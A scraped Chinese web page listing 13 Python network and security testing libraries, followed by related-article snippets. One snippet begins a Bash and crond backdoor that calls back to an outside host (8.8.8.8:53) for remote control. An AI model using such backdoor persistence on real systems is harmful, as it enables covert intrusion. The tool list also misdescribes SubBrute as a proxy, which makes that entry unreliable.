13个web安全-python网络测试工具+白帽黑客必备,大神整理,小白可以先收藏起来

Python有很多完善可用的库,这里面就包含渗透测试工具,所以广大白帽黑客大多都使用Python语言,这样更有利于利用Python提供的这些库参与漏洞研究、逆向工程和渗透等工作。

本文列出13个python网络测试工具,共大家参考学习。

1、Scapy,Scapy3k:发送,嗅探和剖析并伪造网络数据包,可以做交互式应用或单纯的作为库来使用。

2、pypcap,pcapy和pylibpcap:几个不同的libpcap捆绑Python库

3、libdnet:低级别的网络路由器,可用于接口查找和以太网帧转发

4、dpkt:快速、轻量级的数据包创建、解析工具,适用于基本TCP/IP协议

5、Impacket:探测和解码网络数据包,支持更高级别协议比如NMB和SMB

6、pynids:libnids封装提供嗅探,IP碎片整理,TCP流重组和端口扫描检测

7、Dirtbags py-pcap:无需libpcap即可读取pcap文件

8、flowgrep:通过正则表达式查找数据包中的Payloads

9、Knock Subdomain Scan:通过字典枚举目标域上的子域名

10、SubBrute:可扩展的TCP/UDP中间代理,支持即时修改非标准协议

11、Pytbull:灵活的IDS/IPS测试框架(配有300多个测试用例)

12、Spoodle:大量子域名+Poodle漏洞扫描器

13、SMBMap:枚举域中的Samba共享驱动器

您觉得这些库够用了吗?是不是还有很多别的好用的库呢?

小编有自己的学习交流群,大家如果想要学习交流可以一起,719+139+688,无论大神还是小白,小编都欢迎你们的到来。

原文地址:http://blog.51cto.com/13460911/2109447

时间: 2024-11-01 04:37:51

13个web安全-python网络测试工具+白帽黑客必备,大神整理,小白可以先收藏起来的相关文章

Hadoop2.2简单上传文件,web环境下启动报错,求大神

String home = "hdfs://192.168.0.212:8020/";String src = "/root/桌面/111.jpg";String dst = "/6.jpg";InputStream in = new BufferedInputStream(new FileInputStream(src));Configuration conf = new Configuration();FileSystem fs = File

web前端大神整理:CSS 布局经典问题

本文来自前端大神的整理,主要对 CSS 布局中常见的经典问题进行简单说明,并提供相关解决方案的参考链接,涉及到三栏式布局,负 margin,清除浮动,居中布局,响应式设计,Flexbox 布局,等等. CSS 基础知识 下面几个入门教程不错: 幕课网 – HTML+CSS基础课程:偏基础,可以在线练习和预览 MDN – CSS入门教程: MDN 的官方文档 学习 CSS 布局:排版和配色特别舒服,简短但不深入,适合概览入门 CSS 定位问题 主要就是经典的绝对定位,相对定位问题. 10个文档学布

各类后门整理!【白帽黑客必备生存技能】

Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器. 利用方法 先创建/etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹.以下脚本代表全自动反弹到 8.8.8.8 的 53 端口. nano /etc/xxxx #!/bin/bash if netstat -ano|grep -v grep | grep "8.8.8.8">/dev/null then echo "OK&q

购物车 python作业 后面有些问题 请大神帮忙完善一下,谢谢哈

功能要求: 要求用户输入总资产,例如:2000显示商品列表,让用户根据序号选择商品,加入购物车购买,如果商品总额大于总资产,提示账户余额不足,否则,购买成功.附加:可充值.某商品移除购物车goods = [ {"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇&quo

Linux系统管理之Python生态工具、文本处理和系统管理

一.Python生态工具 一.Python内置小工具 1.秒级启动一个下载服务器 Python 内置了一个下载服务器就能够显著提升效率了 . 例如, 你的同事要让你传的文件位于某一个目录下,那么,你可以进入这个目 录 , 然后执行下面的命令启动一个下载服务器 : Python2实现: python -m SimpleHTTPServer Python3实现: 在 Python 3 中,由于对系统库进行了重新整理,因此,使用方式会有不同: python -m http.server 执行上面的命令

[转]web服务器压力测试工具

http_load学习心得: 测试网站每秒所能承受的平均访问量(吞吐量) http_load -parallel 5 -fetches 1000 urls.txt这段命令行是同时使用5个进程,随机访问urls.txt中的网址列表,总共访问1000次.运行之后的结果: 1000 fetches, 5 max parallel, 6e+06 bytes, in 58.1026 seconds6000 mean bytes/connection17.2109 fetches/sec, 103266 b

2016年最好的15个Web设计和开发工具

本文由码农网 – 小峰原创翻译,转载请看清文末的转载要求,欢迎参与我们的付费投稿计划! 网络无处不在.世界上几乎没有地方是没有被因特网所渗透的.无孔不入的网络为Web设计师和开发人员开辟了新的机遇渠道.每家企业都在争取在这个在线平台上展现头角,以便于在这场竞争中占据优势.这就是为什么设计师和开发人员的需求大大增加.但是web开发的标准相比几年前,已经提升了若干个档次.这是为什么市场总是对最先进.最高效的web设计和开发工具有需求的原因. 网络革命催生了web设计师和开发者,web设计师和开发者遍

IPerf——网络测试工具介绍与源码解析(4)

上篇随笔讲到了TCP模式下的客户端,接下来会讲一下TCP模式普通场景下的服务端,说普通场景则是暂时不考虑双向测试的可能,毕竟了解一项东西还是先从简单的情况下入手会快些. 对于服务端,并不是我们认为的直接创建服务端线程,而是先创建一个监听者线程,在本地绑定套接字后进行蹲点监听. 在Listener类中,Run成员函数执行一个do-while循环接收等待来自对端的连接,循环中调用Accept函数,该函数会阻塞,直至接收到对端的连接并通过thread_Settings*类型的指针参数返回客户端的信息,

[转]Python打包工具

作者:Tarek Ziadé,翻译:张吉 原文:http://www.aosabook.org/en/packaging.html 转载地址:http://www.ituring.com.cn/article/19090 14.1 简介 对于如何安装软件,目前有两种思想流派.第一种是说软件应该自给自足,不依赖于其它任何部件,这点在Windows和Mac OS X系统中很流行.这种方式简化了软件的管理:每个软件都有自己独立的“领域”,安装和卸载它们不会对操作系统产生影响.如果软件依赖一项不常见的类